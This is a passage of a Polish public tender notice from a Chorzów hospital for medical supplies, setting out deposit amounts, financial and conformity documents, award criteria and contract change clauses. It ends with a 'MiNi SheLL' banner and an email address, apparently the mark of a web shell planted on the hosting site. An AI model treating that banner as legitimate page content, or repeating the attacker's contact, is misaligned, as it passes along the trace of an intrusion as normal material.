Część zamówienia nr 19 - Elektrody do rzutu serca dla dorosłych - 50% wartości szacunkowej części (bez VAT): 6 000,00 zł;
Część zamówienia nr 20 - Fartuch foliowy -50% wartości szacunkowej części (bez VAT): 350,00 zł;
Część zamówienia nr 21 - Kaniule i wkłucia centralne - 50% wartości szacunkowej części (bez VAT): 3 016,71 zł;
Część zamówienia nr 22 - Rękawice sterylne - 3 - 50% wartości szacunkowej części (bez VAT): 157,41 zł;
Część zamówienia nr 23 - Wkłady workowe - 50% wartości szacunkowej części (bez VAT): 1 005,00 zł;
Część zamówienia nr 24 - Koce do ogrzewania pacjentów -50% wartości szacunkowej części (bez VAT): 1 472,50 zł;
Część zamówienia nr 25 - Wałek i podkładki pozycjonujące, przeciwodleżynowe - 50% wartości szacunkowej części (bez VAT): 578,38 zł;
Część zamówienia nr 26 - Pojemniki na odpady medyczne - 50% wartości szacunkowej części (bez VAT): 2 319,00 zł.

Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej wymaganej przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego warunku.
Uwaga: jeżeli Wykonawca będzie polegał na zdolności finansowej innych podmiotów zobowiązany jest dołączyć do oferty przetargowej:
- pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu zamówienia wraz  ze wskazaniem zakresu oraz sposobu wykorzystania zasobów udostępnianych, charakteru stosunków, zakresu i okresu udziału innego podmiotu przy wykonaniu zamówienia, celem potwierdzenia i oceny, czy stosunek łączący Wykonawcę z podmiotem udostępniającym potencjał faktycznie gwarantuje  rzeczywisty dostęp do wskazanych zasobów.
(Wykonawca może skorzystać z przygotowanego przez Zamawiającego załącznika, może też modyfikować jego treść - załącznik nr 1 do SIWZ (formularz ofertowy) oraz załącznik nr 5 do SIWZ (oświadczenie).)
- informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym te podmioty posiadają rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową podmiotów, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert o wysokości środków finansowych nie niższej niż 50% wartości części zamówienia.
Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej wymaganej przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego warunku.
Powyższe dokumenty należy złożyć zgodnie z przesłankami zawartymi w Rozporządzeniu Prezesa Rady Ministrów  z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Ocena spełnienia przez Wykonawców warunków ujętych w art. 22 ust. 1 ustawy dokonana zostanie w oparciu o przedstawione w ofercie przetargowej dokumenty i oświadczenia.
W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ), należy przedłożyć wraz z ofertą:
Celem potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda przedstawienia:
1.w ofercie przetargowej aktualnych rejestrów, deklaracji zgodności, atestów i certyfikatów dopuszczających oferowany sprzętu medyczny do sprzedaży oraz stosowania w lecznictwie zamkniętym na terenie Unii Europejskiej. Zamawiający wymaga, aby załączane przez Wykonawcę do oferty przetargowej rejestracje, atesty lub certyfikaty zawierały adnotację (przypis) informującą, dla której pozycji opisanej w formularzu cenowym zostały złożone;
2. dołączenia do oferty przetargowej katalogów lub innych materiałów opisujących przedmiot zamówienia wraz z oznaczeniem, dla której pozycji opisanej w formularzu cenowym zostały złożone;</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu potwierdzenia zabezpieczenia złożonej oferty wadium zamawiający wymaga załączenia do oferty przetargowej kserokopii wniesionego wadium. Wartość i formy w jakich Wykonawca może zabezpieczyć ofertę wadium zawarto w pkt. VII SIWZ.
2. Zamawiający w przedmiotowym postępowaniu dopuszcza możliwość udziału Podwykonawców przy realizacji zamówienia publicznego. Wykonawca, który będzie korzystał w trakcie realizacji zamówienia z Podwykonawców powinien ująć w załączniku nr 1 do SIWZ (- Formularz ofertowy, strona 2.) informację dla Zamawiającego o częściach zamówienia, które Wykonawca zamierza powierzyć Podwykonawcom w trakcie realizacji zamówienia publicznego.
3. Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w tej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Wzór oświadczenia podmiotu udostępniającego potencjał ujęto w załączniku nr 5 do SIWZ - Zobowiązanie podmiotu/ podmiotów oddających do dyspozycji Wykonawcy niezbędne zasoby (Wykonawca może skorzystać z przygotowanego przez Zamawiającego załącznika, może też modyfikować jego treść).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający oczekuje zawarcia umowy w sprawie zamówienia publicznego na warunkach wynikających z załączonego do specyfikacji istotnych warunków zamówienia wzoru umowy zawierającego istotne dla stron postanowienia. Projekt umowy stanowi załącznik nr 4 do SIWZ. Wszelkie rozliczenia wynikające z realizacji umowy poprzetargowej Zamawiający prowadził będzie z Wykonawcą wybranym w toku niniejszego postępowania przetargowego w PLN (złotych polskich).

projekt umowy § 6 - Istotne zmiany postanowień umownych
1.	Kupujący zastrzega sobie prawo opcji do zmniejszenia ilości asortymentu stanowiącego przedmiot zamówienia ujętego w formularzach cenowych:
a) Maksymalny poziom zamówienia - wynosi 100% wartości umowy i ilości asortymentu stanowiącego przedmiot umowy ujęty:
- w załączniku nr  do umowy (załącznik nr 2 do SIWZ) dla części zamówienia nr  - , 
- w załączniku nr  do umowy (załącznik nr 2 do SIWZ) dla części zamówienia nr  , 
- w załączniku nr  do umowy (załącznik nr 2 do SIWZ) dla części zamówienia nr , 
który może ale nie musi zostać zrealizowany w okresie realizacji umowy. 
b) Minimalny poziom zamówienia - wynosi 80% wartości umowy i ilości asortymentu stanowiącego przedmiot  umowy ujęty w załączniku nr  do umowy (załącznik nr 2 do SIWZ), załączniku nr  do umowy (załącznik nr 2 do SIWZ), w załączniku nr  do umowy (załącznik nr 2 do SIWZ) , który zostanie zrealizowany w okresie realizacji umowy.
c) Dodatkowy zakres - wynosi 20% wartości umowy i ilości asortymentu stanowiącego przedmiot umowy ujęty w załączniku nr  do umowy (załącznik nr 2 do SIWZ), załączniku nr do umowy (załącznik nr 2 do SIWZ), w załączniku nr  do umowy (załącznik nr 2 do SIWZ) , którego realizacja jest uzależniona od potrzeb zamawiającego związanych z fluktuacją wymagań pacjentów, z którego Zamawiający może, ale nie musi skorzystać w okresie realizacji umowy.
2. W zakresie zamówienia opcjonalnego określonego w ust. 1 pkt. c) niniejszego paragrafu Kupujący zastrzega sobie prawo do zmiany:
a) zwiększenia ilości zakupywanego asortymentu stanowiącego przedmiot umowy ujęty w poszczególnych pozycjach opisu przedmiotu zamówienia kosztem zmniejszenia ilości asortymentu nie kupowanego w ramach wartości umowy i ilości asortymentu wskazanych jako zakres dodatkowy umowy.
Zmiana ta może nastąpić w momencie zmiany zasad realizacji świadczeń, wynikających z warunków kontraktu zawartego z NFZ oraz w zależności od schorzeń, z którymi zgłaszają się pacjenci.
Sprzedający w przypadku zaistnienia sytuacji opisanej powyżej jest zobowiązany do zachowania proponowanych cen jednostkowych netto dla zwiększonej ilości zakupywanych towarów.
b) asortymentu określonego w formularzu cenowym poprzez możliwość wprowadzania nowych towarów równoważnych i asortymentowo pokrewnych z ujętymi w formularzu cenowym oraz kosztem asortymentu nie kupowanego po uprzednim obustronnym uzgodnieniu parametrów i cech użytkowych oraz ceny dla wprowadzanego asortymentu zamiennego, celem zabezpieczenia dostaw w przypadku zaprzestania produkcji bądź zmiany zasad realizacji świadczeń medycznych na rzecz hospitalizowanych pacjentów. Sprzedający w przypadku zaistnienia sytuacji opisanej powyżej jest zobowiązany do zachowania proponowanych cen jednostkowych netto jako maksymalnych dla asortymentu wprowadzanego jako równoważny. 
3. Sumaryczna wartość wynagrodzenia umownego Wykonawcy za wykonanie przedmiotu umowy z tytułu realizacji wszystkich części umowy w wyniku dokonywanych zmian ilościowych albo asortymentowych, o których mowa w § 6 ust. 2 pkt. a) i pkt. b) nie może przekroczyć kwoty brutto określonej w § 2 ust. 2 umowy.
4. Kupujący  dopuszcza możliwość zmiany okresu obowiązywania umowy i realizacji dostaw sukcesywnych w przypadku zaistnienia okoliczności leżących po stronie zamawiającego np. spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy.
Wyżej wymienione okoliczności mogą spowodować przedłużenie okresu realizacji dostaw na okres niezbędny do wykorzystania całości asortymentu określonego w przedmiocie umowy, jednak nie dłużej niż 60 dni kalendarzowych, tym samym Sprzedający zobowiązany jest do zachowania cen umownych brutto w okresie przedłużonego terminu realizacji zamówienia.
5. Zmiany umowy w zakresie ust. 2, ust 3 i ust. 4 niniejszego paragrafu regulowane będą odpowiednim aneksem w okresie jej trwania. Stosowanie prawa opcji opisanego w ust. 1 niniejszego paragrafu nie wymaga formy pisemnej - aneksu do umowy. 

Zamawiający wymaga realizacji całości umowy przez Wykonawcę składającego ofertę, bądź przez Wykonawców ubiegających się o udzielenie zamówienia wspólnie, lub też przez Wykonawcę składającego ofertę przetargową 
wraz z Podwykonawcami.
Wykonawca, któremu zostanie powierzone do realizacji zamówienie publiczne zobowiązany jest ustalić zasady wykonywania zamówienia ze swoimi Podwykonawcami oraz zobowiązany jest do regulowania zobowiązań oraz prowadzenia bieżących rozliczeń finansowych z tymi Podwykonawcami bez udziału Zamawiającego.
W trakcie realizacji umowy poprzetargowej Zamawiający może odstąpić na wniosek Wykonawcy od wymagania, aby zamówienie realizowane było przez podmioty wskazane w ofercie przetargowej, jako podmioty udostępniające zasoby na zasadach określonych w art. 26 ust 2b ustawy. W sytuacji tej Wykonawca zobowiązany jest podać Zamawiającemu powody zmiany ww. podmiotu oraz wskazać nowy podmiot, a także przekazać pisemne zobowiązanie tego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na czas korzystania z nich przy wykonaniu zamówienia oraz przedłożyć dokument potwierdzający spełnienie warunków udziału w zakresie dotyczącym tych zasobów przez ww. podmiot.  

Wniosek dotyczący zmiany takiego podmiotu musi zostać złożony w formie pisemnej w siedzibie Zamawiającego (sekretariat SP ZOZ ZSM) wraz z uzasadnieniem i pisemnym zobowiązaniem podmiotu przejmującego obowiązki i zadania dotychczasowego podmiotu. 
Zamawiający w terminie do 5 dni rozpatrzy wniesiony przez Wykonawcę wniosek lub zwróci się o dodatkowe wyjaśnienia lub przedłożenie niezbędnych dokumentów w oparciu o warunki dopuszczenia do udziału w postępowaniu innych podmiotów, które zawarto w niniejszej SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać ze strony internetowej Zamawiającego: www. zsm.com.pl
SIWZ w formie drukowanej można uzyskać w Dziale Zamówień Publicznych tel. 032 34 99 298.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 11:00, miejsce: Sekretariat SPZOZ ZSM ul. Strzelców Bytomskich 11, 41-500 Chorzów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com